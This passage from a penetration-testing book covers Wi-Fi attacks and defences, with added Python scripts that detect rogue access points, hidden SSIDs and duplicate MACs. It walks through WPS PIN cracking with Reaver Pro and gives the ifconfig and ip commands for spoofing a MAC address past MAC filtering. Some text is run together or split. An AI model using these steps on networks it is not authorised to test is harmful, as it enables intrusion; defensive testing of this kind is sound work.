Wi-Fi Protected Setup (WPS) is a wireless standard that enables simple connectivity to “secure” wireless APs. The problem with WPS is that its implementation of registrar PINs makes it easy to connect to wireless and can facilitate attacks on the very WPA/WPA2 pre-shared keys used to lock down the overall system. As we’ve seen over the years with security, everything’s a tradeoff!

WPS is intended for consumer use in home wireless networks. If your wireless environment is like most others that I see, it probably contains consumer-grade wireless APs (routers) that are vulnerable to this attack.

The WPS attack is relatively straightforward using an open source tool called Reaver (https://code.google.com/p/reaver-wps). Reaver works by executing a brute-force attack against the WPS PIN. I use the commercial version, Reaver Pro (www.reaversystems.com), which is a device that you connect your testing system to over Ethernet or USB. Reaver Pro’s interface, as shown in Figure 10-10, is pretty straightforward.

Figure 10-10: The Reaver Pro startup window.

Running Reaver Pro is easy. You simply follow these steps:

1. Connect to the Reaver Pro device by plugging your testing system into the PoE LAN network connection. You should get an IP address from the Reaver Pro device via DHCP.

2. Load a web browser and browse to http://10.9.8.1 and log in with reaver/foo as the username and password.

3. On the home screen, press the Menu button and a list of wireless networks should appear.

4. Select your wireless network from the list and then click Analyze.

5. Let Reaver Pro run and do its thing.

This process is shown in Figure 10-11.

Figure 10-11: Using Reaver Pro to determine that Wi-Fi Protected Setup is enabled.

If you wish to have Reaver Pro automatically start cracking your WPS PIN, you’ll need to click Configure and set the WPS Pin setting to On. WPS PIN cracking can take anywhere from a few minutes to a few hours, but if successful, Reaver Pro will return the WPA pre-shared key or will tell you that the wireless network is too far away or that intruder lockout is enabled.

I’ve had mixed results with Reaver Pro depending on the computer I’m running it on and the wireless AP that I’m testing. It’s still a worthy attack you should pursue if you’re looking to find and fix the wireless flaws that matter.

Countermeasures against the WPS PIN flaw

It’s rare to come across a security fix as straightforward as this one: Disable WPS. If you need to leave WPS enabled, at least set up MAC address controls on your AP(s). It’s not foolproof, but it’s better than nothing! More recent consumer-grade wireless routers also have intruder lockout for the WPS PIN. If the system detects WPS PIN cracking attempts, it will lock out those attempts for a certain period of time. The best thing to do to prevent WPS attacks in the enterprise is to not use low-end wireless routers in the first place.

Rogue wireless devices

Watch out for unauthorized APs and wireless clients that are attached to your network and running in ad-hoc mode.

Also, be sure to educate your users on safe Wi-Fi usage when they’re outside of your office. Communicate to them the dangers of connecting to unknown Wi-Fi and remind them on a periodic and consistent basis. Otherwise, their systems can be hacked or become infected with malware, and guess whose problem it is once they connect back onto your network.

By using NetStumbler or your client manager software, you can test for APs and ad-hoc (or peer-to-peer) devices that don’t belong on your network. You can also use the network monitoring features in a wireless network analyzer, such as OmniPeek and CommView for WiFi.

Look for the following rogue AP characteristics:

Odd SSIDs, including the popular default ones such as linksys and free public wifi.

MAC addresses that don’t belong on your network. Look at the first three bytes of the MAC address (the first six numbers), which specify the vendor name. You can perform a MAC address vendor lookup at http://standards.ieee.org/develop/regauth/oui/public.html to find information on APs you’re unsure of.

Weak radio signals, which can indicate that an AP has been hidden away or is adjacent to or even outside of your building.

Communications across a different radio channel(s) than what your network communicates on.

Degradation in network throughput for any Wi-Fi client.
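The indicators in the list above can be turned into a triage script that runs over a scan export. The added example below is not code from the book or from NetStumbler or CommView: the scan records, the authorized OUI table and the channel plan are constructed sample data, and a real vendor lookup would use the IEEE OUI registry linked above rather than the made-up entries here.

```python
"""Flag observed access points that match the rogue-AP indicators in the text.
Added example; all inventory data and scan records below are constructed."""

# The OUI (first three bytes of the MAC) of the AP hardware you actually own.
# Real entries come from your asset list, checked against the IEEE registry;
# these values are invented for the example.
AUTHORIZED_OUIS = {"02:0A:0B": "in-house AP vendor (constructed OUI)"}
AUTHORIZED_CHANNELS = {1, 6, 11}           # assumed channel plan for this site
DEFAULT_SSIDS = {"linksys", "free public wifi", "default", "dlink", "netgear"}
WEAK_SIGNAL_DBM = -80                       # assumed threshold for "weak radio signal"

# Constructed scan output in the shape NetStumbler or CommView present it.
SAMPLE_SCAN = [
    {"ssid": "CORP-WLAN", "bssid": "02:0A:0B:11:22:33", "channel": 6, "signal": -45},
    {"ssid": "linksys", "bssid": "02:1C:1D:AA:BB:CC", "channel": 9, "signal": -83},
    {"ssid": "BI", "bssid": "02:2E:2F:01:02:03", "channel": 3, "signal": -60},
    {"ssid": "CORP-WLAN", "bssid": "02:0A:0B:44:55:66", "channel": 11, "signal": -52},
]


def oui(mac: str) -> str:
    """Vendor prefix: the first three bytes of the MAC, upper-cased."""
    return mac.upper()[:8]


def triage_ap(ap: dict) -> list:
    """Return every rogue indicator from the text that this AP trips."""
    reasons = []
    if ap["ssid"].strip().lower() in DEFAULT_SSIDS:
        reasons.append(f"default/odd SSID '{ap['ssid']}'")
    if oui(ap["bssid"]) not in AUTHORIZED_OUIS:
        reasons.append(f"unknown vendor OUI {oui(ap['bssid'])}")
    if ap["channel"] not in AUTHORIZED_CHANNELS:
        reasons.append(f"off-plan channel {ap['channel']}")
    if ap["signal"] < WEAK_SIGNAL_DBM:
        reasons.append(f"weak signal {ap['signal']} dBm: hidden, remote, or a neighbour's")
    return reasons


def find_suspects(scan) -> dict:
    """Map BSSID -> reasons for every AP that trips at least one indicator."""
    return {ap["bssid"]: reasons for ap in scan if (reasons := triage_ap(ap))}


if __name__ == "__main__":
    for bssid, reasons in find_suspects(SAMPLE_SCAN).items():
        print(bssid, "->", "; ".join(reasons))
```

Treat the weak-signal hit as a prompt to walk the floor rather than a verdict: as the text notes later, a faint AP on an odd channel is just as likely to be a neighbour's, and only the unknown-OUI and default-SSID hits survive that check.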

In Figure 10-12, NetStumbler has found two potentially unauthorized APs. The ones that stand out are the two with SSIDs of BI and LarsWorld. Notice how they’re running on two different channels, two different speeds, and are made by two different hardware vendors. If you know what’s supposed to be running on your wireless network (you do, don’t you?), unauthorized systems should really stand out.

Figure 10-12: NetStumbler showing potentially unauthorized APs.

NetStumbler does have one limitation: It won’t find APs that have probe response (SSID broadcast) packets disabled. Commercial wireless network analyzers such as CommView for WiFi as well as the open source Kismet look not only for probe responses from APs like NetStumbler does, but also for other 802.11 management packets, such as association responses and beacons. This allows Kismet to detect the presence of hidden Wi-Fi.

If the Linux platform is not your cup of tea, and you’re still looking for a quick and dirty way to root out hidden APs, you can create a client-to-AP reconnection scenario that forces the broadcasting of SSIDs using de-authentication packets. You can find detailed instructions in the book I wrote with Peter T. Davis, Hacking Wireless Networks For Dummies.

The safest way to root out hidden APs is to simply search for 802.11 management packets. You can configure your wireless network analyzer such as OmniPeek to search for 802.11 management packets by enabling a capture filter on 802.11 management packets, as shown in OmniPeek’s options in Figure 10-13.

Figure 10-13: You can configure OmniPeek to detect APs that don’t broadcast their SSIDs.

Figure 10-14 shows how you can use CommView for WiFi to spot an odd network host. For instance, in the example shown in Figure 10-14, Technico and Netgear systems are showing up, but only Ubiquiti hardware is used on this particular network.

Figure 10-14: Using CommView for WiFi to spot wireless systems that don’t belong.

My test network for this example is small compared to what you might see, but you get the idea of how an odd system can stand out.

Wi-Fi set up in ad-hoc (or peer-to-peer) mode enables wireless clients to communicate directly with one another without having to pass through an AP. These types of Wi-Fi operate outside the normal wireless security controls and can cause serious security issues beyond the normal 802.11 vulnerabilities.

You can use just about any wireless network analyzer to find unauthorized ad-hoc devices on your network. If you come across quite a few ad-hoc systems, such as those devices listed as STA (short for station) in CommView for WiFi’s Type column, as shown in Figure 10-15, this could be a good indication that one (or several) person is running unprotected wireless systems or at least has ad-hoc wireless enabled. These systems are often printers and other seemingly benign network systems, but they can be workstations and mobile devices. Either way, they’re potentially putting your network and information at risk, so they’re worth checking out.

Figure 10-15: CommView for WiFi showing several unauthorized ad-hoc clients.

You can also use the handheld Digital Hotspotter I mention earlier in this chapter (see “Choosing Your Tools”) to search for ad-hoc–enabled systems or even a wireless intrusion prevention system (WIPS) to search for beacon packets in which the ESS field is not equal to 1.
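Kismet's approach described above (watch beacons and other management frames rather than probe responses alone) and the ESS-field test for ad-hoc beacons both reduce to reading a few f
ields of an 802.11 management frame. The added example below is mine rather than the book's or Kismet's: it decodes those fields from constructed sample frames, marks an AP whose beacon carries an empty SSID as cloaked, learns the real name from a later probe response, and flags beacons whose capability bits say IBSS rather than ESS. The frame builder exists only to construct the offline sample capture.

```python
"""Decode 802.11 management frames to spot hidden SSIDs and ad hoc networks.
Added example, not from the book or from Kismet; the capture is constructed."""
import struct

MGMT_SUBTYPES = {0x1: "association response", 0x4: "probe request",
                 0x5: "probe response", 0x8: "beacon"}
IE_SSID, IE_DS_PARAM = 0, 3             # information element ids: SSID, DS parameter (channel)
CAP_ESS, CAP_IBSS = 0x0001, 0x0002      # capability bits: infrastructure / ad hoc


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def parse_mgmt_frame(frame: bytes) -> dict:
    """Pull the fields a rogue/hidden-AP hunt needs out of one management frame."""
    fc0 = frame[0]                                  # frame control, first byte
    if (fc0 >> 2) & 0x3 != 0:
        raise ValueError("not a management frame")
    subtype = fc0 >> 4
    info = {"subtype": MGMT_SUBTYPES.get(subtype, f"subtype {subtype:#x}"),
            "source": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22])}
    if subtype not in (0x5, 0x8):                   # only beacons / probe responses carry the body below
        return info
    body = frame[24:]                               # 24-byte MAC header precedes the body
    capability, = struct.unpack_from("<H", body, 10)    # after timestamp (8) + beacon interval (2)
    info["ess"], info["ibss"] = bool(capability & CAP_ESS), bool(capability & CAP_IBSS)
    pos = 12
    while pos + 2 <= len(body):                     # walk the tagged information elements
        ie_id, ie_len = body[pos], body[pos + 1]
        data = body[pos + 2:pos + 2 + ie_len]
        if ie_id == IE_SSID:
            info["ssid"] = data.decode("utf-8", "replace")
            info["hidden_ssid"] = ie_len == 0 or not data.strip(b"\x00")   # cloaked: empty or all NULs
        elif ie_id == IE_DS_PARAM and ie_len == 1:
            info["channel"] = data[0]
        pos += 2 + ie_len
    return info


def inventory(frames) -> dict:
    """Per-BSSID view: hidden-in-beacon, name learned from probe responses, ad hoc flag."""
    seen = {}
    for frame in frames:
        f = parse_mgmt_frame(frame)
        if "ess" not in f:
            continue
        entry = seen.setdefault(f["bssid"], {"ssid": None, "hidden_in_beacon": False,
                                             "adhoc": False, "channel": f.get("channel")})
        if f["subtype"] == "beacon" and f.get("hidden_ssid"):
            entry["hidden_in_beacon"] = True
        elif f.get("ssid") and not f.get("hidden_ssid"):
            entry["ssid"] = f["ssid"]
        if f["ibss"] or not f["ess"]:                   # the text's "ESS field not equal to 1" test
            entry["adhoc"] = True
    return seen


def build_frame(subtype: int, bssid: str, ssid: bytes, capability: int, channel: int) -> bytes:
    """Build a minimal beacon/probe-response frame as an offline test fixture only."""
    header = (struct.pack("<BBH", subtype << 4, 0, 0) + mac_bytes("ff:ff:ff:ff:ff:ff")
              + mac_bytes(bssid) + mac_bytes(bssid) + b"\x00\x00")
    body = struct.pack("<QHH", 0, 100, capability)      # timestamp, interval, capability
    body += bytes([IE_SSID, len(ssid)]) + ssid + bytes([IE_DS_PARAM, 1, channel])
    return header + body


# Constructed capture: a cloaked AP, its probe response, a normal AP, an ad hoc laptop.
SAMPLE_CAPTURE = [
    build_frame(0x8, "02:0a:0b:11:22:33", b"", CAP_ESS, 6),
    build_frame(0x5, "02:0a:0b:11:22:33", b"CORP-WLAN", CAP_ESS, 6),
    build_frame(0x8, "02:0a:0b:44:55:66", b"CORP-WLAN", CAP_ESS, 11),
    build_frame(0x8, "02:5a:5b:de:ad:01", b"adhoc-laptop", CAP_IBSS, 1),
]

if __name__ == "__main__":
    for bssid, entry in inventory(SAMPLE_CAPTURE).items():
        print(bssid, entry)
```

This is why a passive capture of management frames finds what a probe-request scanner misses: the cloaked AP still beacons (with an empty SSID), and the moment any legitimate client probes it, the probe response carries the name in the clear.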

Walk around your building or campus (warwalk, if you will) to perform this test to see what you can find. Physically look for devices that don’t belong and keep in mind that a well-placed AP or Wi-Fi client that’s turned off won’t show up in your network analysis tools. Search near the outskirts of the building or near any publicly accessible areas. Scope out boardrooms and the offices of upper-level managers for any unauthorized devices. These places may be off-limits, but that’s all the more reason to check them for rogue APs.

When searching for unauthorized wireless devices on your network, keep in mind that you might be picking up signals from nearby offices or homes. Therefore, if you find something, don’t immediately assume it’s a rogue device. One way to figure out whether a device is in a nearby office or home is by the strength of the signal you detect. Devices outside your office should have a weaker signal than those inside. Using a wireless network analyzer in this way helps narrow the location and prevent false alarms in case you detect legitimate neighboring wireless devices.

It pays to know your network environment. Knowing what your surroundings should look like makes it easier to spot potential problems.

A good way to determine whether an AP you discover is attached to your wired network is to perform reverse ARPs (RARPs) to map IP addresses to MAC addresses. You can do this at a command prompt by using the arp -a command and simply comparing IP addresses with the corresponding MAC address to see whether you have a match.
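Both the MAC-address lookup in the “Checking for worldwide recognition” steps earlier and the wired-attachment check just described start from arp -a output. The added example below (mine, not the book's) parses constructed arp -a text in the Windows and Linux layouts and compares a discovered AP's BSSID against the cache; the IP addresses are made up and the MACs are the same placeholder values the chapter uses elsewhere.

```python
"""Parse arp -a output and match it against a wireless BSSID.
Added example, not from the book; the ARP listings are constructed."""
import re

MAC_RE = re.compile(r"\b([0-9a-f]{2}[:-]){5}[0-9a-f]{2}\b", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed arp -a output in the Windows layout.
SAMPLE_ARP_WINDOWS = """
Interface: 192.168.1.10 --- 0x3
  Internet Address      Physical Address      Type
  192.168.1.1           00-40-96-ff-ff-ff     dynamic
  192.168.1.25          00-09-5b-ff-ff-ff     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""
# The same cache as Linux arp -a prints it (also constructed).
SAMPLE_ARP_LINUX = """
? (192.168.1.1) at 00:40:96:ff:ff:ff [ether] on eth0
? (192.168.1.25) at 00:09:5b:ff:ff:ff [ether] on eth0
"""


def normalize_mac(mac: str) -> str:
    """Lower-case, colon-separated, so Windows and Linux forms compare equal."""
    return mac.lower().replace("-", ":")


def parse_arp_table(text: str) -> dict:
    """Map IP -> MAC for every line that carries both; headers are skipped."""
    table = {}
    for line in text.splitlines():
        ip, mac = IP_RE.search(line), MAC_RE.search(line)
        if ip and mac:
            table[ip.group()] = normalize_mac(mac.group())
    return table


def mac_for_ip(table: dict, ip: str):
    """Step 1 of the WiGLE check: the AP's MAC, given its IP (after a ping)."""
    return table.get(ip)


def wired_match(table: dict, bssid: str):
    """The wired IP whose MAC equals a discovered AP's BSSID, or None."""
    want = normalize_mac(bssid)
    return next((ip for ip, mac in table.items() if mac == want), None)


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_WINDOWS)
    print("AP MAC for 192.168.1.1:", mac_for_ip(table, "192.168.1.1"))
    print("BSSID 00:40:96:FF:FF:FF on the wire at:", wired_match(table, "00:40:96:FF:FF:FF"))
    print("BSSID 02:aa:bb:cc:dd:ee on the wire at:", wired_match(table, "02:aa:bb:cc:dd:ee"))
```

One caveat for the wired-attachment check: many APs use a different MAC on their Ethernet port than the BSSID they beacon on the radio side, so a miss here does not prove the AP is off your wire. Compare the vendor OUI too, and treat a near-identical MAC in the cache as a probable match worth tracing to a switch port.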

Also, keep in mind that Wi-Fi authenticates the wireless devices, not the users. Criminal hackers can use this to their advantage by gaining access to a wireless client via remote-access software, such as telnet or SSH, or by exploiting a known application or OS vulnerability. After they do that, they potentially have full access to your network and you would be none the wiser.

Countermeasures against rogue wireless devices

The only way to detect rogue APs and wireless hosts on your network is to monitor your wireless network proactively (in real time if possible), looking for indicators that wireless clients or rogue APs might exist. A WIPS is perfect for such monitoring. But if rogue APs or clients don’t show up, that doesn’t mean you’re off the hook. You might also need to break out the wireless network analyzer or other network management application.

Use personal firewall software, such as Windows Firewall, on all wireless hosts to prevent unauthorized remote access into your hosts, and subsequently, your network.

Finally, don’t forget about user education. It’s not foolproof, but it can help serve as an additional layer of defense. Ensure that security is always on the top of everyone’s mind. Chapter 19 contains additional information about user awareness and training.

MAC spoofing

A common defense for wireless networks is Media Access Control (MAC) address controls. This is where you configure your APs to allow only wireless clients with known MAC addresses to connect to the network. Consequently, a very common hack against wireless networks is MAC address spoofing.

The bad guys can easily spoof MAC addresses in Linux, by using the ifconfig command, and in Windows, by using the SMAC utility, as I describe in Chapter 9. However, like WEP and WPA, MAC address-based access controls are another layer of protection and better than nothing at all. If someone spoofs one of your MAC addresses, the only way to detect malicious behavior is through contextual awareness by spotting the same MAC address being used in two or more places on the WLAN, which can be tricky.
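The contextual-awareness check described above, one MAC address in two places at once, is straightforward to automate over association logs from a controller or WIPS. The added example below is mine, not the book's: the log format and its entries are constructed, the client MACs are the chapter's placeholder values, and the 60-second window is an assumed threshold that separates a genuine roam between APs from an impersonated address.

```python
"""Detect one station MAC associated at two APs within a short window.
Added example, not from the book; the log lines and their format are constructed."""
import re
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ap=(?P<ap>\S+) sta=(?P<sta>[0-9a-f:]{17}) rssi=(?P<rssi>-?\d+)")

# Constructed association log. The third line is the tell: the same client MAC
# shows up on a second AP three seconds after it was last heard on the first.
# The last two lines are a legitimate roam twenty minutes apart.
SAMPLE_LOG = """\
2016-03-01T09:00:01 ap=ap-lobby sta=00:09:5b:ff:ff:ff rssi=-41 event=assoc
2016-03-01T09:00:09 ap=ap-lobby sta=00:09:5b:ff:ff:ff rssi=-43 event=data
2016-03-01T09:00:12 ap=ap-east-wing sta=00:09:5b:ff:ff:ff rssi=-70 event=assoc
2016-03-01T09:05:00 ap=ap-lobby sta=00:09:5b:aa:bb:cc rssi=-50 event=assoc
2016-03-01T09:25:00 ap=ap-east-wing sta=00:09:5b:aa:bb:cc rssi=-55 event=assoc
"""


def detect_duplicate_macs(lines, window_seconds: float = 60) -> list:
    """Alert when a station MAC is seen at two different APs within window_seconds.
    A real client roams and so changes AP, but not within seconds of still
    being served elsewhere; an impersonated MAC appears in two places at once."""
    last = {}          # sta -> (timestamp, ap, rssi) of the most recent sighting
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                                   # ignore lines in another format
        ts = datetime.fromisoformat(m["ts"])
        sta, ap, rssi = m["sta"], m["ap"], int(m["rssi"])
        if sta in last:
            prev_ts, prev_ap, prev_rssi = last[sta]
            delta = (ts - prev_ts).total_seconds()
            if ap != prev_ap and delta <= window_seconds:
                alerts.append({"sta": sta, "aps": (prev_ap, ap), "seconds_apart": delta,
                               "rssi": (prev_rssi, rssi), "at": m["ts"]})
        last[sta] = (ts, ap, rssi)
    return alerts


if __name__ == "__main__":
    for alert in detect_duplicate_macs(SAMPLE_LOG.splitlines()):
        print(f"{alert['at']}: {alert['sta']} seen at {alert['aps'][0]} and "
              f"{alert['aps'][1]} {alert['seconds_apart']:.0f}s apart, rssi {alert['rssi']}")
```

The signal-strength pair in each alert is the second clue the text hints at: a client that is genuinely roaming fades from one AP as it grows stronger at the next, whereas two radios sharing a MAC report two unrelated signal levels at the same moment.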

OnesimplewaytodeterminewhetheranAPisusingMACaddresscontrolsistotrytoassociatewithitandobtainanIPaddressviaDHCP.IfyoucangetanIP

address,theAPdoesn’thaveMACaddresscontrolsenabled.

The following steps outline how you can test your MAC address controls and demonstrate just how easy they are to circumvent:

1. Find an AP to attach to.

You can do this simply by loading NetStumbler, as shown in Figure 10-16.

In this test network, the AP with the SSID of doh! is the one I want to test. Note the MAC address of this AP as well. This will help you make sure you're looking at the right packets in the steps that follow. Although I've hidden most of the MAC address of this AP for the sake of privacy, let's just say its MAC address is 00:40:96:FF:FF:FF. Also, notice in Figure 10-16 that NetStumbler was able to determine the IP address of the AP. Getting an IP address will help you confirm that you're on the right wireless network.

2. Using a WLAN analyzer, look for a wireless client sending a probe request packet to the broadcast address or the AP replying with a probe response.

You can set up a filter in your analyzer to look for such frames, or you can simply capture packets and just browse through looking for the AP's MAC address, which you noted in Step 1. Figure 10-17 shows what the Probe Request and Probe Response packets look like.

Note that the wireless client (again for privacy, suppose its full MAC address is 00:09:5B:FF:FF:FF) first sends out a probe request to the broadcast address (FF:FF:FF:FF:FF:FF) in packet number 98. The AP with the MAC address I'm looking for replies with a Probe Response to 00:09:5B:FF:FF:FF, confirming that this is indeed a wireless client on the network for which I'll be testing MAC address controls.

3. Change your test computer's MAC address to that of the wireless client's MAC address you found in Step 2.

In UNIX and Linux, you can change your MAC address very easily by using the ifconfig command as follows:

a. Log in as root and then disable the network interface.

Insert the network interface name that you want to disable (typically wlan0 or ath0) into the command, like this:

[root@localhost root]# ifconfig wlan0 down

b. Enter the new MAC address you want to use.

Insert the fake MAC address and the network interface name like this:

[root@localhost root]# ifconfig wlan0 hw ether 01:23:45:67:89:ab

The following command also works in Linux:

[root@localhost root]# ip link set wlan0 address 01:23:45:67:89:ab

c. Bring the interface back up with this command:

[root@localhost root]# ifconfig wlan0 up

If you change your Linux MAC addresses often, you can use a more feature-rich utility called GNU MAC Changer (https://github.com/alobbs/macchanger).

More recent versions of Windows make it difficult to change your MAC address. You might be able to change your MAC addresses in your wireless NIC properties via Control Panel. However, if you don't like tweaking the OS in this manner (or cannot), you can try a neat and inexpensive tool created by KLC Consulting called SMAC (available at www.klcconsulting.net/smac). To change your MAC address, you can use the steps I outline in Chapter 9.

When you're done, SMAC presents something similar to the screen shown in Figure 10-18.

To reverse any of the preceding MAC address changes, simply reverse the steps performed and then delete any data you created.

Note that APs, routers, switches, and the like might detect when more than one system is using the same MAC address on the network (that is, yours and the host that you're spoofing). You might have to wait until that system is no longer on the network; however, I rarely see any issues spoofing MAC addresses in this way, so you probably won't have to do anything.

4. Ensure that you are connected to the appropriate SSID.

Even if your network is running WEP or WPA, you can still test your MAC address controls. You just need to enter your encryption key(s) before you can connect.

5. Obtain an IP address on the network.

You can do this by rebooting or disabling/enabling your wireless NIC. You can also do it manually by running ipconfig /renew at a Windows command prompt or by entering a known IP address in your wireless network card's network properties.

6. Confirm that you're on the network by pinging another host or browsing the Internet.

In this example, I could ping the AP (10.11.12.154) or simply load my favorite web browser to see whether I can access the Internet.

Figure 10-16: Finding an accessible AP via NetStumbler.

Figure 10-17: Looking for the MAC address of a wireless client on the network being tested.

Figure 10-18: SMAC showing a spoofed MAC address.

That's all there is to it! You've circumvented your wireless network's MAC address controls in six simple steps. Piece of cake!

Countermeasures against MAC spoofing

The easiest way to prevent the circumvention of MAC address controls and subsequent unauthorized attachment to your wireless network is to enable WPA2. Another way to control MAC spoofing is by using a WIPS. This second option is certainly more costly, but it could be well worth the money when you consider the other proactive monitoring and blocking benefits such a system would provide.
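The contextual-awareness check described above, spotting one client MAC in two places on the WLAN at nearly the same time, can be automated over association events exported from your APs or WIPS. The following is an added example, not code from the book: it parses a constructed association log in which the client MAC 00:09:5B:FF:FF:FF from the test steps appears, and the 30-second window is an assumed heuristic that you would tune to your floor plan.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample of association events as an AP controller or WIPS might
# export them (not real captures). One line per event:
#   <ISO timestamp> assoc client=<MAC> ap=<AP name>
# 00:09:5B:FF:FF:FF is the (partially hidden) client MAC from the test above.
# It appears on doh-east and then, 7 seconds later, on doh-west: one radio
# cannot do that, so either the AP names are wrong or two devices share the MAC.
# 00:0C:29:11:22:33 roams between the same two APs ten minutes apart, which is
# ordinary behaviour and must not be flagged.
SAMPLE_LOG = """\
2016-03-01T10:00:05 assoc client=00:09:5B:FF:FF:FF ap=doh-east
2016-03-01T10:00:09 assoc client=00:0C:29:11:22:33 ap=doh-east
2016-03-01T10:00:12 assoc client=00:09:5B:FF:FF:FF ap=doh-west
2016-03-01T10:10:40 assoc client=00:0C:29:11:22:33 ap=doh-west
2016-03-01T10:11:02 assoc client=00:09:5b:ff:ff:ff ap=doh-west
"""


@dataclass(frozen=True)
class AssocEvent:
    when: datetime
    client: str   # MAC address, normalised to lower case
    ap: str       # name (or BSSID) of the AP the client associated with


def parse_log(text: str) -> List[AssocEvent]:
    """Parse the constructed log format above; lines of other shapes are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[1] != "assoc":
            continue
        fields = dict(p.split("=", 1) for p in parts[2:])
        events.append(AssocEvent(
            when=datetime.fromisoformat(parts[0]),
            # Case varies between tools; 00:09:5B and 00:09:5b are the same MAC.
            client=fields["client"].lower(),
            ap=fields["ap"],
        ))
    return sorted(events, key=lambda e: e.when)


def find_duplicate_mac_use(
    events: List[AssocEvent],
    window: timedelta = timedelta(seconds=30),
) -> List[Tuple[str, str, str, timedelta]]:
    """Flag a client MAC that associates with two different APs within `window`.

    A legitimate client roams, but it cannot be on two APs almost at once, so
    the same MAC on different APs seconds apart is the "same MAC in two places"
    indicator the text describes. The window is a heuristic: too small and you
    miss a spoofer that waits, too large and normal roaming in a dense
    deployment produces false alarms. A spoofer sitting on the same AP as the
    victim is not caught here; that case relies on the duplicate-address
    detection of the AP or switch that the text mentions.
    Returns (mac, earlier AP, later AP, gap) for each suspicious pair.
    """
    last_seen: Dict[str, AssocEvent] = {}
    alerts = []
    for ev in events:  # parse_log() already sorted these by time
        prev = last_seen.get(ev.client)
        if prev is not None and prev.ap != ev.ap and ev.when - prev.when <= window:
            alerts.append((ev.client, prev.ap, ev.ap, ev.when - prev.when))
        last_seen[ev.client] = ev
    return alerts


if __name__ == "__main__":
    for mac, ap_a, ap_b, gap in find_duplicate_mac_use(parse_log(SAMPLE_LOG)):
        print(f"possible MAC spoofing: {mac} on {ap_a} then {ap_b} "
              f"{int(gap.total_seconds())}s later")
```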

Physical security problems

Various physical security vulnerabilities can result in physical theft, the reconfiguration of wireless devices, and the capturing of confidential information. You should look for the following security vulnerabilities when testing your systems:

APs mounted on the outside of a building and accessible to the public.

Poorly mounted antennas — or the wrong types of antennas — that broadcast too strong a signal and that are accessible to the public. You can view the signal strength in NetStumbler, your wireless client manager, or one of the commercial tools I mention earlier in this chapter.

These issues are often overlooked because of rushed installations, improper planning, and lack of technical knowledge, but they can come back to haunt you. The book Wireless Networks For Dummies provides more details.

Countermeasures against physical security problems

Ensure that APs, antennas, and other wireless and network infrastructure equipment are locked away in secure closets, ceilings, or other places that are difficult for a would-be intruder to access physically. Terminate your APs outside any firewall or other network perimeter security devices — or at least in a DMZ — whenever possible. If you place unsecured wireless equipment inside your secure network, it can negate any benefits you would get from your perimeter security devices, such as your firewall.

If wireless signals are propagating outside your building where they don't belong, either

Turn down the transmit power setting of your AP.

Use a smaller or different antenna (semidirectional or directional) to decrease the signal.

Some basic planning helps prevent these vulnerabilities.

Vulnerable wireless workstations

Wireless workstations such as Windows-based laptops can have tons of security vulnerabilities — from weak passwords to unpatched security holes to the storage of WEP and WPA encryption keys locally. Most of the well-known wireless client vulnerabilities have been patched by their respective vendors, but you never know whether all your wireless systems are running the latest (and usually safest) versions of operating systems, wireless client software, and other software applications.

In addition to using the wireless client, stumbling, and network analysis software I mention earlier in this chapter, you should also search for wireless client vulnerabilities by performing authenticated scans using various vulnerability testing tools, such as GFI LanGuard, Nexpose, and Acunetix Web Vulnerability Scanner.

These programs aren't wireless-specific, but they might turn up vulnerabilities in your wireless computers that you might not have discovered or thought about testing otherwise. I cover operating system and application vulnerabilities as well as using the tools in the preceding list in Parts IV and V of this book.

Countermeasures against vulnerable wireless workstations

You can implement the following countermeasures to keep your workstations from being used as entry points into your wireless network:

Regularly perform vulnerability assessments on your wireless workstations, in addition to other network hosts.

Apply the latest vendor security patches and enforce strong user passwords.

Use personal firewalls and endpoint security software on all wireless systems where possible, including phones and tablets, to keep malicious intruders off those systems and out of your network.

Install anti-malware software.

Default configuration settings

Similar to wireless workstations, wireless APs have many known vulnerabilities. The most common ones are default SSIDs and admin passwords. The more specific ones occur only on certain hardware and software versions that are posted in vulnerability databases and vendor websites. Many wireless systems still have WEP and WPA disabled by default as well.

Countermeasures against default configuration settings exploits

You can implement some of the simplest and most effective security countermeasures for Wi-Fi — and they're all free:

Make sure that you change default admin passwords and SSIDs.

At a minimum, enable WPA2. Use very strong pre-shared keys (PSKs) consisting of at least 20 random characters or use WPA/WPA2 in enterprise mode with a RADIUS server for host authentication.

Disable SSID broadcasting if you don't need this feature.

Apply the latest firmware patches for your APs and Wi-Fi cards. This countermeasure helps to prevent various vulnerabilities to minimize the exploitation of publicly known holes related to management interfaces on APs and client-management software on the clients.

Chapter 11

Mobile Devices

In This Chapter

Seeking out the common weaknesses in laptops, phones, and tablets

Executing security tests to uncover crucial mobile flaws

Exploring the security vulnerabilities associated with the Internet of Things (IoT)

Minimizing mobile security risks

Mobile computing is the new target for business — and for hacking. It seems that everyone has a mobile device of some sort for either personal or business use; often both. If not properly secured, mobile devices connected to the enterprise network represent thousands upon thousands of unprotected islands of information floating about, out of your control.

Because of all the phones, tablets, and laptops running numerous operating system platforms chock-full of apps, an infinite number of risks are associated with mobile computing. Rather than delving into all the variables, this chapter explores some of the biggest, most common mobile security flaws that could impact you and your business.

Sizing Up Mobile Vulnerabilities

It pays to find and fix the low-hanging fruit on your network. That's where you get the most bang for your buck. The following mobile laptop, phone, and tablet weaknesses should be front and center on your priority list:

No encryption

Poorly implemented encryption

No power-on passwords

Easily guessed (or cracked) power-on passwords

For other technologies and systems (web applications, operating systems, and so on), you can usually find just the testing tool you need. However, for finding mobile-related flaws, relatively few security testing tools are available. Not surprisingly, the more expensive tools often enable you to uncover the big flaws with the least amount of pain and hassle.

Cracking Laptop Passwords

Arguably the greatest threat to any business's security is unencrypted laptops. Given all the headlines and awareness about this effectively inexcusable security vulnerability, I can't believe it's still so prevalent in business. This section explores tools you can use to crack unencrypted laptop passwords on Windows, Linux, or Mac OS X systems. You then find out about the basic countermeasures to prevent this vulnerability.

Choosing your tools

